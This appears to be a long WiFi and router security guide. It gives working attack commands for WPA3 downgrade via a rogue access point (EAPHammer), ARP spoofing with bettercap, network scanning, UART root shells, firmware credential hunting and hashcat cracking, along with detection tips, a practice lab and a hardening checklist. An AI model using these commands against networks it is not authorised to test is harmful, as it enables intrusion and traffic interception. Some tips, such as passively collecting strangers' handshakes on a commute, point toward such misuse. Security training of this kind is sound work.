Trick: Cloud cracking is cheaper than buying hardware. A single RTX 4090 on vast.ai costs ~$0.09/hour. One researcher calculated that cracking a specific ISPβs password pattern costs ~$965 to exhaust (all combinations), ~$483 on average. Compare that to buying an $13,000 rig.
π WPA3 Downgrade β The Most Exploited WPA3 Vulnerability
WPA3 was supposed to fix WiFi security. It did β but most routers run it in Transition Mode (WPA2/WPA3 mixed), which lets older devices connect using the weaker WPA2. Same password for both modes. An attacker creates a fake access point that only advertises WPA2, and client devices happily connect using WPA2 instead of WPA3. Crack the captured WPA2 handshake β you now have the WPA3 password.
This was first documented in the 2019 Dragonblood research by Mathy Vanhoef and Eyal Ronen. In 2025, RedLegg reported that every WPA3 network they encountered in real-world pentests was running transition mode β and all were successfully downgraded.
What you need: Target AP running WPA3 Transition Mode (both WPA2 and WPA3 advertised). Active client devices. Two WiFi interfaces β one monitors/deauths, one runs the rogue AP.
# EAPHammer (used by RedLegg in real field assessments)
./eaphammer -e TARGET_SSID -c 6 --auth wpa-psk --wpa-passphrase KNOWN_OR_GUESSED --wpa-version 2 -i wlan0
# Wifite2 (used by TrustedSec β automated approach)
sudo wifite --wpa --kill
Confirmed vulnerable in real pentests: MikroTik, Cisco Meraki, Ubiquiti, and Aruba APs β all fell when transition mode was enabled. TrustedSec noted PMKID attacks failed (PMF was on), but the rogue AP downgrade worked every time.
| Defense | How Well It Works |
|---|---|
| WPA3-only mode (no transition) | Completely prevents the attack β but breaks older devices |
| Wi-Fi Alliance βTransition Disableβ | Prevents re-downgrade after first WPA3 connection β inconsistent support |
| Separate SSIDs for WPA2 and WPA3 with different passwords | Eliminates shared credential risk |
| Strong passphrase (14+ mixed characters) | Even if WPA2 handshake is captured, resists offline cracking |
Trick: Check your router right now. Settings β WiFi Security. If it says βWPA2/WPA3β β thatβs transition mode, and itβs vulnerable. Switch to βWPA3 onlyβ if all your devices support it. If even one device doesnβt support WPA3, youβre stuck in transition mode β consider replacing that device.
π‘ Your Router Is Already in a Public Database
WiGLE (Wireless Geographic Logging Engine) is a crowdsourced database of over 1.2 billion WiFi networks. Each entry includes: network name, encryption type, router manufacturer (from MAC address), and exact GPS coordinates. Anyone can search an address and see every WiFi network nearby.
This is how attackers plan without visiting the location. Check if your address shows your network at wigle.net.
Your phone is also leaking. Every phone constantly shouts βhey, are my saved networks nearby?β These shouts (called probe requests) contain the NAMES of every WiFi network youβve ever connected to β your home, workplace, hotels, coffee shops.
Researchers in 2026 achieved 93-98% accuracy re-identifying specific devices despite MAC randomization β just from the pattern of these broadcasts. Another team (WhoFi) identifies specific people at 95.5% accuracy from how their bodies disrupt WiFi signals. No cameras. No microphones. Just WiFi.
| Whatβs Leaking | Who Can See It | How to Stop It |
|---|---|---|
| Your routerβs name + GPS location | Anyone with WiGLE access | Rename SSID to something generic |
| Networks youβve connected to | Anyone in WiFi range with a $30 adapter | Delete old saved WiFi networks from your phone |
| Your physical presence + movement | Anyone on the same network reading WiFi signal distortion | Use ethernet. VPN doesnβt help here. |
Test yourself right now: Go to your phoneβs WiFi settings β Saved Networks. Count how many you recognize. Each one gets broadcast every time your phone searches for WiFi. Delete the ones you donβt use anymore β youβre reducing your wireless fingerprint.
π¦ Router Botnets β When Your Router Secretly Works for Criminals
300,000+ routers are currently enslaved in the AISURU botnet alone. They mine crypto, relay attacks, and proxy criminal traffic β all while you watch Netflix and notice nothing except maybe slightly slower internet.
How routers get recruited (three paths):
| Infection Route | How It Works | Real Example |
|---|---|---|
| Unpatched vulnerability | Router has a known bug the manufacturer never fixed | D-Link CVE-2026-0625 β critical RCE, actively exploited in end-of-life devices |
| Default/weak credentials | Attacker tries admin/admin or derives password from MAC address | Quad7 botnet targeting TP-Link Archer C7 |
| Firmware supply chain | Attacker compromises the manufacturerβs update server | AISURU hijacked Totolinkβs update server β malware pushed to tens of thousands of routers |
Why factory reset doesnβt save you:
| Malware | How It Survives | Factory Reset Works? |
|---|---|---|
| KadNap | Installs a timer that re-downloads malware every 55 minutes, renames itself to β.asusrouterβ | |
| AISURU | Replaces the entire operating system with its own custom firmware | |
| AVrecon/SocksEscort | Flashes firmware that permanently blocks all future updates | |
| Chalubo | βPumpkin Eclipseβ β permanently bricked 600,000 routers in 72 hours |
The original Mirai botnet (2016) used just 62 common default password combinations to enslave 380,000+ devices. Its attacks included 665 Gbps against KrebsOnSecurity, 1 Tbps against OVH, and the Dyn DNS attack that knocked out half the US East Coastβs internet. Modern variant AISURU hit 31.4 Tbps against Cloudflare in February 2026.
Trick: If you suspect compromise, factory reset is NOT enough. Download the latest firmware directly from the manufacturerβs website β flash manually via admin panel or UART recovery β change every password β check if your model is end-of-life (if so, replace the hardware). The only way to be sure is to overwrite the entire firmware from a known-good source.
β° The End-of-Life Crisis β Your Manufacturer Abandoned You
Router manufacturers support a device for 2-4 years. Routers run for 8-10+. When a router reaches βend of life,β the manufacturer stops patching β even for CRITICAL vulnerabilities with active exploitation.
| Router | Vulnerability | Severity | Manufacturerβs Response |
|---|---|---|---|
| NETGEAR R7000P | Command injection | High | βEnd-of-support. No security updates planned.β |
| Linksys E9450-SG | Auth bypass β anyone can access admin | CVSS 8.8 | βEnd-of-life. No firmware update planned.β |
| Sierra Wireless AirLink | Active RCE exploitation | Critical | CISA told agencies to disconnect by Jan 2026 |
| D-Link (multiple) | CVE-2026-0625 β remote code execution | Critical | Actively exploited in EOL devices |
| MikroTik WebFig | CVE-2025-61481 β admin over cleartext HTTP | CVSS 10.0 | Serves login over HTTP by default after factory reset |
The CISA (US governmentβs cybersecurity agency) literally told federal agencies: βDisconnect these routers or replace them.β If the government says throw it away, maybe donβt keep it plugged in.
Trick: Google your router model + βend of lifeβ or βend of supportβ right now. If itβs been discontinued, youβre running unpatched firmware with known exploits that are actively being used in the wild. Replace it. A new router costs $50-80. A compromised network costs everything.
π© UART Debug β Root Shell Access for $5
Router manufacturers leave debug ports on circuit boards from development and almost never disable them. A $5 USB-to-serial adapter plugged into these ports gives you direct root access β full control of the routerβs operating system, no password needed.
Opening the router: Screws hide under rubber feet. Inside, look for 3-4 small holes (unpopulated pads) near the main chip, sometimes labeled βUART,β βCON1,β or βJP1.β
Identify the pins (you need a $10 multimeter):
| Step | Multimeter Setting | What to Do | What Youβre Looking For |
|---|---|---|---|
| Find GND | Continuity (beep mode) | Touch one probe to metal shielding, other probe to each pad | The pad that beeps = GND |
| Find VCC | DC Voltage | Power on router, measure each remaining pad against GND | Steady 3.3V or 5V = VCC (donβt connect this) |
| Find TX | DC Voltage | Watch during boot | Voltage jumping 0V β 3.3V = TX (data being sent) |
| Find RX | β | Itβs the remaining pad | RX = where youβll send commands TO the router |
Trick: Shine a bright light from the BACK of the circuit board and look from above. Pads connected to ground planes show copper connections on all sides β thatβs how you spot GND without a multimeter.
Connect: USB-to-TTL adapter (FTDI FT232RL, CP2102, or CH340G β $2-15). Wire TXβRX and RXβTX (crossed). GNDβGND. Never connect VCC. Make sure voltages match β a 5V adapter on a 3.3V board will fry the router.
# Open the connection (115200 baud works for most routers)
screen /dev/ttyUSB0 115200
# Now power-cycle the router (unplug β plug back in)
Success: Clear text scrolls β bootloader messages, Linux kernel booting, and then a login prompt (or direct root shell #). Common defaults: root:root, admin:admin, root:(blank).
Garbled characters (Γ ΓΏΓΈΓΌΓΎβ¬)? Wrong baud rate. Try 9600, 57600, 38400, 230400. A JTAGulator (~$170) brute-forces both pin assignment AND baud rate automatically.
𧬠Firmware Emulation β Hack a Router Without Owning One
Every attack above requires either physical access or WiFi proximity (except internet attacks). But thereβs a way to find NEW vulnerabilities in routers you donβt even own β download the firmware from the manufacturerβs website and dissect it on your laptop.
Think of it like downloading a copy of the routerβs brain and running it in a virtual environment where you can poke, prod, and break things without consequences.
The Pipeline: Download β Extract β Emulate β Find Bugs
Step 1 β Download firmware. Most manufacturers publish firmware files on their support pages. Google β[router model] firmware download.β
Step 2 β Extract the filesystem:
# binwalk rips apart firmware images β finds and extracts embedded filesystems
binwalk -e firmware.bin
# Usually extracts a SquashFS filesystem for MIPS or ARM architecture
Step 3 β Look for low-hanging fruit (no emulation needed):
# Search for hardcoded passwords
grep -r "password" squashfs-root/
grep -r "admin" squashfs-root/etc/
# Search for private keys left in firmware
find squashfs-root/ -name "*.pem" -o -name "*.key"
# Search for hidden debug URLs
grep -r "debug" squashfs-root/www/
grep -r "backdoor" squashfs-root/
Real-world finds: D-Link DIR-412 firmware had hardcoded telnet username βAlphanetworks.β MikroTik mAP2n contained an SSH private key in the firmware dump. TP-Link was found using the same private key across multiple router models β for both root access and firmware signing.
Step 4 β Full emulation (run the routerβs web interface on your laptop):
| Tool | Success Rate | Stars | Best For |
|---|---|---|---|
| EMBA | ~95% | 3.4K | Comprehensive automated analysis β runs binwalk, CVE correlation, and produces HTML reports |
| FirmAE | 79% | 3.4K | Router/IP camera emulation β discovered 12 zero-day vulnerabilities in testing |
| Firmadyne | 16% | 3.2K | The original β lower success rate but widely documented |
| FAT | ~16% | 2.6K | Wraps Firmadyne with easier setup |
FirmAEβs five arbitration techniques solved the emulation problems that made Firmadyne fail on 84% of firmware images. On 1,124 tested firmware images, FirmAE discovered 12 zero-day vulnerabilities affecting 23 devices, producing multiple CVEs for D-Link routers.
Step 5 β Find vulnerabilities in the running emulation:
Once the web interface is running in emulation, test for command injection (the most common router vulnerability β unsanitized input passed to system() in CGI handlers), authentication bypass, hardcoded credentials accessible through the web panel, and hidden debug endpoints.
The 2024-2025 router CVE landscape is dominated by one pattern: command injection in web management interfaces. Unsanitized user input gets passed to shell commands. Notable examples: OpenWrt CVE-2024-54143 (CVSS 9.3), Zyxel CVE-2025-13942 (CVSS 9.8), D-Link CVE-2025-60854 (CVSS 9.8), ASUS AiCloud CVE-2025-59366 (critical).
Forescoutβs 2025 TP-Link research found: leftover debug code providing root access (CVE-2025-7851), incomplete patches that left vulnerabilities partially accessible, and the same private signing key reused across multiple devices.
Trick: You donβt need to own a router to find bugs in it. Download the firmware β extract with binwalk β run EMBA for automated analysis β it finds hardcoded creds, known CVEs, and suspicious code patterns automatically. The OWASP Firmware Security Testing Methodology is the step-by-step playbook. Ghidra (free, by the NSA) handles reverse engineering the binary files.
π Am I Being Hacked Right Now? β Detection for Home Users
You just read 13 attack types. The first question your brain asks: βIs someone doing this to ME?β Hereβs how to check.
The $5 Deauth Detector
A $3-5 ESP8266 board running DeauthDetector firmware turns into a physical alarm β LED goes RED during active deauth attacks, GREEN when clear. An advanced version sends push notifications to your phone. Maltronics sells a pre-built one for ~$10-20 requiring zero setup.
For software detection, Nzyme is an open-source wireless IDS (Intrusion Detection System β software that watches for attacks). Run it on a Raspberry Pi with a WiFi adapter in monitor mode and it monitors deauth frame rates, detects rogue APs, spots evil twin SSIDs, and alerts on anything abnormal. Research using Raspberry Pi + Kismet achieved 10/10 attack detection with average response time of 3.42 seconds.
Wireshark detection filters (requires adapter in monitor mode):
# See deauthentication frames (the "kick everyone off" attack)
wlan.fc.type_subtype == 0x0c
# See disassociation frames (similar attack, different frame type)
wlan.fc.type_subtype == 0x0a
If you see hundreds of these frames per second targeting your network β someone is attacking.
Check Your Router Right Now (No Tools Needed)
| What to Check | Where to Find It | Red Flag |
|---|---|---|
| Connected devices | Router admin β Connected Devices / DHCP list | Devices you donβt recognize |
| DNS settings | Router admin β WAN / Internet settings | Changed from your ISPβs defaults or set to unknown IPs |
| Port forwarding rules | Router admin β Advanced β Port Forwarding | Rules you didnβt create (especially port 3389, 22, 445) |
| Remote management | Router admin β Administration β Remote Access | Enabled when you didnβt enable it |
| UPnP | Router admin β Advanced β UPnP | Enabled (should be off) |
| Firmware version | Router admin β System / Status | Outdated or unknown version |
| WPS | Router admin β Wireless β WPS | Enabled (should be off on most routers) |
Test yourself right now: Log into your router (usually 192.168.1.1 or 192.168.0.1, username/password often on a sticker on the bottom of the router). Check the DNS settings. If theyβre set to anything other than your ISPβs addresses or a known service (8.8.8.8 for Google, 1.1.1.1 for Cloudflare), someone may have changed them. This takes 60 seconds and costs nothing.
What WIDS Catches vs What It Misses
| Attack Type | Enterprise WIDS Detects? | Home Detection? |
|---|---|---|
| Deauth flood (hundreds of frames/second) | ||
| Slow deauth (1 frame/second) | ||
| Evil Twin (duplicate SSID) | ||
| Rogue AP | ||
| PMKID capture | ||
| CSRF/DNS rebinding |
A 2025 Nozomi Networks report found 94% of wireless networks worldwide lack adequate protection against deauth attacks. WPA3 with PMF (Protected Management Frames) blocks standard deauth β but Mathy Vanhoefβs research group found bypasses even with PMF enabled.
π΅οΈ Password Cracked β Now What Can an Attacker Actually Do Inside?
Every WiFi guide ends at βpassword cracked.β But the beginnerβs real question is: βthen what?β What does being on someoneβs network actually let you see and do?
The HTTPS Reality Check
Hereβs the honest truth: HTTPS killed the classic sniffer. In 2025, virtually all websites use encrypted connections (HTTPS). If you ARP-spoof someoneβs connection (trick their computer into sending all traffic through yours), hereβs what you CAN and CANβT see:
| You CAN See | You CANβT See |
|---|---|
| DNS queries β every domain name they visit (google.com, pornhub.com, bank.com) | Page content β what theyβre reading, typing, watching |
| TLS SNI hostnames β visible in the connection setup | Passwords, form data, login credentials for HTTPS sites |
| Device hostnames via mDNS broadcasts | Banking app transactions |
| Unencrypted IoT device traffic (many smart devices still use HTTP) | Anything from apps with certificate pinning (Signal, WhatsApp) |
| Timing β when they visit sites, how long they stay | Messages, emails, search queries |
The post-compromise tools (for your own lab network):
# Bettercap β the Swiss Army knife for network attacks
# ARP spoof + network sniff (see all DNS queries on the network)
sudo bettercap
# Inside bettercap's interactive shell:
net.probe on # Discover all devices
arp.spoof on # Redirect traffic through you
net.sniff on # Watch the traffic flow
Lateral Movement β Where Real Damage Happens
The real power of being on someoneβs network isnβt sniffing encrypted traffic β itβs reaching devices that were never meant to be internet-accessible:
# Scan the entire local network for running services
nmap -sV --allports 192.168.1.0/24
What typically shows up:
| Device | Ports Found | Risk |
|---|---|---|
| Printers | Port 9100 (raw printing) | Usually zero authentication β can read print jobs, access stored documents |
| NAS / file servers | Ports 445 (SMB), 2049 (NFS) | Shared folders often have weak or no passwords |
| IP cameras | Port 554 (RTSP video stream) | Default credentials are common (admin/admin) |
| Smart TVs | Various HTTP ports | Embedded web servers with known vulnerabilities |
| The router itself | Port 80/443 (admin panel) | Still running admin/admin on 192.168.1.1 |
Trick: The APT28 βNearest Neighborβ attack proved this at nation-state scale. Russian intelligence compromised a nearby businessβs WiFi, pivoted to dual-homed devices, and used PowerShell living-off-the-land techniques to reach the actual target. WiFi β lateral movement β full network compromise. The WiFi password was just the door. The house is what mattered.
πͺ Windows Users β What Works and What Doesn't
Most WiFi security tools are Linux-native. Hereβs the honest breakdown for Windows users.
| Approach | What Works | What Doesnβt |
|---|---|---|
| Native Windows | Hashcat (GPU cracking β same speed as Linux), Wireshark, Nmap | Monitor mode, packet injection, hcxdumptool, aircrack-ng, Fluxion |
| WSL2 | Text processing, hashcat (CPU-only), scripting | USB WiFi adapter passthrough β WSL2 canβt access USB hardware |
| Kali on USB (dual boot) | Everything β full bare-metal performance | Requires reboot to switch OS |
| VM (VirtualBox/VMware) | Most tools run | USB WiFi passthrough is unreliable β breaks timing-sensitive captures |
The practical Windows workflow:
Capture on Linux (Kali USB boot) β copy .hc22000 file to Windows β Crack on Windows (hashcat with gaming GPU)
Capture requires Linux because Windows doesnβt support monitor mode on consumer adapters. But cracking is pure GPU math β hashcat runs identically on Windows. So capture where the radio tools work, crack where your expensive GPU lives.
Trick: If you have a gaming PC with an RTX card, that IS your cracking rig. Hashcat on Windows is literally the same speed as Linux. Install it from hashcat.net, download the RockYou wordlist, and youβre ready. Capture on Kali, crack on Windows.
π± Android Users β Rooted vs Non-Rooted (The Honest Truth)
The honest ceiling is severe. Phone WiFi chips donβt expose monitor mode. No airodump-ng, no handshake capture, no deauth, no packet injection β regardless of root status or custom ROMs.
| Capability | Non-Rooted | Rooted | Rooted + NetHunter Full |
|---|---|---|---|
| WiFi scanning (channels, signal, encryption) | |||
| Network device scanning | |||
| Monitor mode (internal WiFi) | |||
| Monitor mode (external USB adapter via OTG) | |||
| WPS PIN testing | |||
| Run Kali tools | |||
| Crack WPA passwords |
Kali NetHunter has 3 editions β only one does WiFi attacks:
- Rootless (any Android, Termux): Kali userspace, but NO WiFi attack capability
- Lite (rooted): Adds HID attacks, still no WiFi injection
- Full (rooted + device-specific custom kernel): The ONLY edition with WiFi attacks β and even then, you usually need an external USB adapter via OTG cable
For phone-only users (students with no laptop): The minimum viable WiFi testing setup is a $10 USB OTG cable + a compatible cheap adapter (TP-Link TL-WN722N v1, ~$15) + Kali NetHunter Full on a supported rooted device. Total: ~$25 on top of your phone. An ESP8266 board ($3-5) serves as a practice target.
Trick: Realistic answer β use your phone for reconnaissance (WiFi scanning, network mapping with Fing, WiGLE wardriving). Use a laptop for actual attacks. Phones lack the hardware and driver support for serious WiFi testing. If you have $40 and a laptop, a Kali USB stick + Alfa adapter gets you further than any phone setup ever will.
π€ Autonomous WiFi Collection β Devices That Hack While You Walk
Every attack above requires sitting down, running commands, and waiting. But thereβs a passive approach β devices that run unsupervised and silently collect WiFi handshakes from every network they encounter.
Pwnagotchi β AI-Driven Handshake Collector
Pwnagotchi is a Raspberry Pi-based device with a cute e-ink face that uses AI to optimize handshake collection. It learns which networks to target and when, getting better over time in familiar environments. Carries in your bag, runs on a battery, collects handshakes passively.
Hardware: Raspberry Pi Zero 2W, 2.13" e-ink display (Waveshare V4), 16GB+ MicroSD, 5V/2A power bank. ~$50 total.
2025 reality check: The most active fork (jayofelony, 2.6K stars) removed the AI entirely β the branch is literally called βnoai.β The AI component was destabilizing the WiFi firmware. Alternative forks like aluminum-ice/scifijunkie (v1.9.0) retain the AI if you want it.
Handshakes get stored as PCAP files in /root/handshakes/ β compatible with hashcat for offline cracking. Plugins enable WiGLE uploads, GPS logging, and cooperative multi-Pwnagotchi operation.
ESP32 Marauder Wardrive Mode
Marauderβs wardrive mode + GPS module logs every WiFi network encountered with GPS coordinates, encryption type, and signal strength β exportable to WiGLE or KML (Google Earth). The new Apex 5 ($99, Feb 2026) adds dual-band 2.4+5GHz scanning. The VoyagerRF v2 board adds 3dBi antenna, MicroSD, GPS, and NRF24/CC1101 socket β a complete RF Swiss Army knife for Flipper Zero.
WiGLEβs database now exceeds 150 million WiFi networks worldwide. Research found opportunistic wardrive collection captures at least 60% of total WiFi APs in any given area.
Trick: Pwnagotchi in a backpack during your daily commute passively collects handshakes from every WiFi network it encounters. Over a week, you build a collection of crackable handshakes without ever running a single command. Ethical use: test if your own networkβs password would resist this kind of passive collection.
π§ͺ Build a Legal Practice Lab β Test Everything Without Touching Anyone's Network
Every attack in this guide can be practiced legally on equipment you own. Hereβs the complete setup from zero hardware to advanced enterprise scenarios.
Physical Lab (~$60-80 total):
| Item | Price | Purpose |
|---|---|---|
| Laptop (8GB+ RAM, SSD) | You have one | Runs Kali Linux |
| Alfa AWUS036ACM | ~$40 | Monitor mode + injection |
| Spare router (eBay/thrift store) | $5-15 | Your test target |
| Second WiFi adapter (optional) | ~$25 | Evil Twin attacks need two interfaces |
Configure the spare router with different security modes:
| Security Mode | What You Practice |
|---|---|
WPA2-PSK with weak password (12345678) |
Handshake capture + hashcat cracking |
| WPA2-PSK with strong password + WPS ON | WPS PIN attacks with Reaver + Pixie Dust |
| WPA3 Transition Mode | WPA3 downgrade attacks |
| Open network (no password) | Evil Twin + captive portal attacks |
Use bare-metal Kali, not a VM. USB passthrough for WiFi adapters in VirtualBox/VMware breaks timing-sensitive captures. Install Kali on a USB stick for dual-boot convenience.
Isolate your lab: Run the spare router with NO internet connection. Reduce TX power to minimum. Interior room for RF isolation. For proper shielding, a Faraday cage (~$200-500, or DIY with copper mesh).
Zero-Hardware Virtual Lab (Free)
WiFiChallengeLab (GitHub r4ulcl/WiFiChallengeLab-docker, GPL-3.0) uses a Linux kernel module called mac80211_hwsim to create fully virtualized WiFi networks in Docker β no physical WiFi hardware needed at all. Challenges cover OPN, WEP, WPA2-PSK, WPA3-SAE, WPA3-OWE, and WPA2-Enterprise. Includes Nzyme WIDS for detection practice. CTFd challenge platform at lab.wifichallenge.com.
OSWP exam takers consistently recommend it as the best free practice environment.
Advanced virtual scenarios beyond the pre-built challenges: mac80211_hwsim creates arbitrary virtual WiFi interfaces (modprobe mac80211_hwsim radios=5 = 5 virtual adapters). Build custom WPA2-Enterprise labs with FreeRADIUS, test 802.1X certificate auth, multi-AP roaming β all in software. freerad-lab on GitHub provides a Docker-based WPA2-Enterprise lab with EAP-TLS support.
Practice Progression (30-Day Path):
| Days | What to Practice | Tool |
|---|---|---|
| 1-3 | Setup + reconnaissance β verify adapter, monitor mode, scan networks | airodump-ng |
| 3-7 | WPA2 handshake capture on your own router (known weak password) | airodump-ng + aireplay-ng |
| 7-14 | Crack with wordlists, then graduate to hashcat GPU cracking | aircrack-ng β hashcat |
| 14-17 | Automated tools | Wifite2, Airgeddon |
| 17-21 | WPS PIN attacks | Reaver (brute-force) + Pixie Dust (near-instant) |
| 21-28 | Evil Twin + captive portal | Fluxion |
| 28+ | WPA2-Enterprise attacks | EAPHammer |
| Month 2+ | WPA3 transition mode downgrade | EAPHammer / DragonShift |
Trick: Your first session goal: capture a handshake from your own router (set to a known weak password) and crack it with aircrack-ng. This takes 5-30 minutes once setup works. That first βholy shit it actually worksβ moment is what hooks you. Everything after is just expanding the toolkit.
π° Career Path β How to Actually Get Paid for This
Everything in this guide maps to real career paths paying $75,000-$200,000+/year.
Certifications
| Certification | Cost | Difficulty | What It Covers | Value |
|---|---|---|---|---|
| OSWP (Offensive Security Wireless Professional) | $450 standalone | 2/5 | WPA2-PSK, WPA2-Enterprise, rogue APs, captive portals (no WPA3 yet) | The WiFi pentesting credential β 3h45m practical exam, crack 3 APs |
| OSCP (Offensive Security Certified Professional) | $1,599+ | 4/5 | General penetration testing (includes some wireless) | The industry standard β get this first for broader employability |
| Both included in Learn One subscription | $2,499/year | β | Full courseware + labs + exam attempts | Best value if pursuing both |
Most OSWP reviewers pass within 90 minutes of practical time. WiFiChallengeLab is the universally recommended free practice environment.
Salary Ranges (2025-2026)
| Role | Experience | Salary Range |
|---|---|---|
| Junior Penetration Tester | 0-2 years | $75,000 - $100,000 |
| Mid-Level Pentester / Security Engineer | 3-5 years | $100,000 - $140,000 |
| Senior IoT Security Engineer | 5+ years | $140,000 - $205,000 |
| Offensive Security Researcher (NVIDIA, Apple) | 5+ years | $224,000 - $425,500 |
| Bug Bounty (top earners) | Varies | 2.7Γ median software engineer salary in their country |
The career ladder: Junior Pentester (OSCP) β add OSWP specialization β IoT Penetration Tester β Senior IoT Security Engineer β Security Architect / Principal Researcher.
Bug Bounty Programs Accepting Router/IoT Submissions
| Platform | Focus | Notes |
|---|---|---|
| HackerOne | DoD, GM, enterprise programs | Largest platform |
| Bugcrowd | Categorizes by IoT skill | Growing IoT focus |
| Intigriti | 125K+ vetted researchers | Explicitly supports hardware/IoT assets |
| Vendor-specific programs | Smart home devices (Vesync, etc.) | Check vendor security pages |
Industries hiring wireless security: Healthcare (medical device security), automotive (connected vehicles), telecom, defense (Lockheed Martin, Raytheon, MIT Lincoln Lab), consulting (Rapid7, NCC Group, SpecterOps).
At DEF CON 33, researchers found 10+ vulnerabilities from hacking public transit bus WiFi β vehicular router β bus private network β ADAS/APTS vehicle control systems. Backdoors in cybersecurity-certified vehicular routers compromised all global units of that model.
Trick: βWireless penetration testerβ isnβt a standalone job title on most boards. Search for βpenetration testerβ + filter by OSWP requirement β Indeed returns 30+ positions. WiFi pentesting is a SPECIALIZATION within general pentesting, not a separate career. Get OSCP first (broad employability), add OSWP second (niche expertise that commands premium rates for wireless assessments).
π What to Actually Do Right Now β The 10-Minute Hardening Guide
These steps take 10 minutes total and block the majority of attacks described above. Do them now.
Step 1 β Change default admin credentials. Go to your routerβs admin panel (usually 192.168.1.1), change both username and password. Blocks CSRF, default credential exploitation, brute-force.
Step 2 β Disable UPnP. Advanced settings β UPnP β OFF. Blocks silent firewall port opening.
Step 3 β Disable remote management and TR-069. Unless your ISP requires them, turn both off. Blocks 41 million exposed routersβ worth of attack surface.
Step 4 β Update firmware. Check manufacturerβs website. No updates for 2+ years? Your router may be end-of-life β replace it.
Step 5 β Use WPA3-only mode. If all devices support WPA3, switch from βWPA2/WPA3β to βWPA3 only.β Blocks transition mode downgrade.
Step 6 β Change default router IP. 192.168.1.1 β 192.168.73.1 or similar. Breaks automated CSRF and DNS rebinding.
Step 7 β Rename SSID. Donβt use your name or apartment number. Generic name defeats WiGLE reconnaissance.
Step 8 β Delete old saved WiFi networks. Phone settings β Saved Networks β delete unused ones. Shrinks your probe request fingerprint.
Step 9 β Log out of router admin. Close the browser tab. Prevents CSRF that depends on active session.
Step 10 β Set a calendar reminder. Check firmware every 3 months. Router security isnβt a one-time thing.
| Risk Level | Your Situation | Action |
|---|---|---|
| Router 5+ years old, no updates available | Replace the hardware β $50-80 | |
| Default admin password (admin/admin) | Change it right now β 30 seconds | |
| UPnP enabled, remote management on | Disable both β 2 minutes | |
| WPA2/WPA3 transitional mode | Switch to WPA3-only if possible | |
| SSID with your name/apartment number | Rename β 1 minute | |
| Never checked firmware version | Check and update β 5 minutes |
Quick Hits
| Want to Know | Answer |
|---|---|
| CSRF β a webpage silently changes your routerβs DNS. Zero skill needed, works from anywhere on earth. | |
| Default password derivation β RouterKeygen calculates the password from the MAC address in milliseconds. 99.88% success on UPC routers. | |
| PMKID capture β grabs the hash directly from the router. Nobody disconnects, no logs, completely silent. | |
| 8-digit numeric WiFi password falls in 38 seconds on a single RTX 4090. RockYou wordlist (14.3M passwords) exhausts in 5.5 seconds. | |
| 12+ mixed characters β even 8 GPUs canβt touch it. Password complexity is the final defense regardless of protocol. | |
| Chalubo βPumpkin Eclipseβ β permanently bricked 600,000 routers in 72 hours. Physical replacement required. | |
| AISURU β 300K+ routers, hit 31.4 Tbps DDoS against Cloudflare (Feb 2026). | |
| Probe requests broadcast your saved network names. Researchers re-identify devices at 93-98% accuracy despite MAC randomization. | |
| Only in WPA3-only mode. Transition mode (WPA2/WPA3) falls to downgrade attack in every pentest. | |
| No. KadNap, AISURU, AVrecon all survive factory reset. Flash firmware manually from manufacturerβs website. | |
| OSWP cert ($450) β IoT pentesting roles ($75K-205K/year). Bug bounty researchers earn 2.7Γ median dev salary. | |
| WiFiChallengeLab β virtualized WiFi labs in Docker, no hardware, free. Or: $5 eBay router + $40 Alfa adapter. | |
| Capture on Kali USB boot β crack on Windows with your gaming GPU. Hashcat speed is identical on both. | |
| Most 2026 attacks come through the internet β no WiFi proximity needed. CSRF, DNS rebinding, UPnP, TR-069. | |
| Download firmware β binwalk β EMBA (95% emulation success). No hardware needed. How CVEs actually get discovered. | |
| Change admin creds + disable UPnP + update firmware. Blocks the majority of everything above. |
Your router has been running 24/7 since the day you plugged it in. Itβs the one device you never update, never log into, and never think about β but it controls every packet that enters and leaves your digital life. Attackers built an entire industry around that neglect. 47.1 million DDoS attacks last year. 300,000 routers enslaved right now. 600,000 bricked in a weekend. You just read every way it breaks and every command to test it yourself. 10 minutes of hardening closes the door on 90% of whatβs out there. The other 10%? You now have the exact tools, commands, and career path to make that your job.

!